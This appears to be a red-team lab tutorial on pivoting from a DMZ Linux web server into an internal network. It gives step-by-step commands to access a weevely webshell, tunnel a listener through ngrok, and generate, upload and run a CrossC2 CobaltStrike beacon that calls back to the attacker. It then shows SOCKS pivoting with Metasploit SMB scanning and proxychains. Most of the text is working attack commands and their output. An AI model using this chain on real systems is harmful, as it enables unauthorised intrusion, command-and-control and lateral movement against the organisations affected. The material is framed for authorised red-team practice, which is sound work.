# Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

In this laboratory, we will understand how to use a simple webshell to deploy a CobaltStrike beacon on a Linux target system mainly available and placed on a DMZ and use it for pivoting through this machine into the internal network. This is a common scenario many times used during my red teaming assessments, for instance, when I find a flaw that permits the uploading of a webshell into the web-server. Let's do it.

## Webshell - weevely

I use weevely many times to deploy my webshell remotely. More information about this tool [**here**](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-with-weevely-via-webshell).

```bash
weevely generate <password> <path>
weevely <URL> <password> [cmd]
```

Example how to access the target machine:

```bash
kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 
```

At this moment, we got a remote connection with the target server. It's time to prepare ngrok + CobaltStrike beacon to pivot into the internal network from our localhost connection.

## [ngrok](https://ngrok.com/)

In this step, you can use a trustable machine (e.g., EC2 instance from AWS) or simply ngrok. ngrok is a very useful tool that allows us to expose our localhost server through any NAT or firewall - and masquerading our public IP address - of course :nerd:&#x20;

{% embed url="<https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#ngrok>" %}

We can use a configuration file as described on the link above, or simply by using the following command to start a new server on port: 8083:

```bash
./ngrok tcp 8083
```

Now, it's time to create the CobaltStrike stager.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTUEx0rH_RPSBe3peS%2Fimage.png?alt=media\&token=be22fb6a-c30f-4983-a703-6777e2adac73)

## [**CrossC2** ](https://github.com/gloxec/CrossC2)

CrossC2 framework allows us to generate CobaltStrike's cross-platform payloads, e.g., Linux x64 and x86 beacons.

We can create an x64 or x86 payload depending on the target system architecture.&#x20;

**Tip**: use the `uname -a` command to check the target version.

**ngrok\_ip**: The resolved IP address from the ngrok address.\
**ngrok\_port:** The assigned port to the ngrok address.

```bash
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTV6YyQ2GmAFaxMNwH%2Fimage.png?alt=media\&token=d81cfcc0-ea26-491b-b70b-37449dc4cded)

The x64 payload was generated, and we can check it using the ***file*** command:

```bash
kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```

Now, it's time to upload it into the target Linux webserver using weevely:

```bash
target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross
```

## Create CS Listener

The next step is to create the CS listener. We need to add our internal IP address on:

* **HTTPS HOSTS**
* **HTTPS HOST (STAGER)**

and the local port (8083) where the ngrok connection is mapped - **HTTPS PORT (C2)**.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTXOyqkDn3wqTBFMDs%2Fimage.png?alt=media\&token=a8fea78f-d60e-4d71-a3b3-fa4cd56482f0)

After that, the payload can be executed on the weevely webshell:

```bash
./cross
```

And yeah, we got it :sunglasses:&#x20;

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTYRF6g-ba7TC3ZVym%2Fimage.png?alt=media\&token=d05cae06-8a54-45da-99f6-d03f268c8bcd)

## Pivoting using CS

In the next phase, we will:

* **Create a socks4**
* **Use Metasploit to pivot internally;** or
* **Take advantage of proxychains tool** (my favorite approach) :space\_invader:&#x20;

By interacting with the new machine, you have the following options:

![Socks commands were highlighted.](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_M-TuzI8-drlLwXl%2Fimage.png?alt=media\&token=afd5909d-98ac-451a-af89-4c9161042587)

We can create the new socket using the CS console, or by clicking on the target machine.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_t5o9hI81TCRPROf%2Fimage.png?alt=media\&token=c5e958e8-5fc7-438c-b666-26f7233eccc6)

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_xdU4L3Ka-gA6EYB%2Fimage.png?alt=media\&token=78b59cfe-d48a-4e09-8ce3-0874600edc3f)

Clicking on "**Launch**" button, the socket is created on the local machine (attacker machine). We can confirm it by using the following command:

```bash
netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN
```

### Metasploit for pivoting internally

Accessing the "**Proxy Pivots**" menu, we can get the command to pivot through MSF.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTb4qREpCcmECs1YwE%2Fimage.png?alt=media\&token=8e8cf382-becf-4fd0-82c8-16b2556d0e17)

After getting the command above, we can start msfconsole and paste the command to set up the new tunnel and scan hosts available on the internal network.

```bash
msfconsole
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
set RHOSTS=192.168.0.0/24
run
```

### **Take advantage of proxychains tool**&#x20;

To use proxychains, first, we need to configure the new socks by accessing the ***/etc/proxychains.conf*** file.

```bash
sudo vim /etc/proxychains.conf 
socks4 10.0.2.15 14833
```

After that, we can use a lot of tools, such as crackmapexec, nmap, impacket-tools, and so on, by using the following combination:

```bash
proxychains nc 192.168.x.x 445 -v
```

## Bonus

**Creating CobaltStrike random C2 profile**

{% embed url="<https://github.com/threatexpress/random_c2_profile?s=09>" %}

**CobaltStrike C2 malleable profiles**

{% embed url="<https://github.com/xx0hcd/Malleable-C2-Profiles>" %}

## References

{% embed url="<https://blog.cobaltstrike.com/2016/06/01/howto-port-forwards-through-a-socks-proxy/>" %}

{% embed url="<https://wh0ale.github.io/2019/12/11/VulnStack%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/>" %}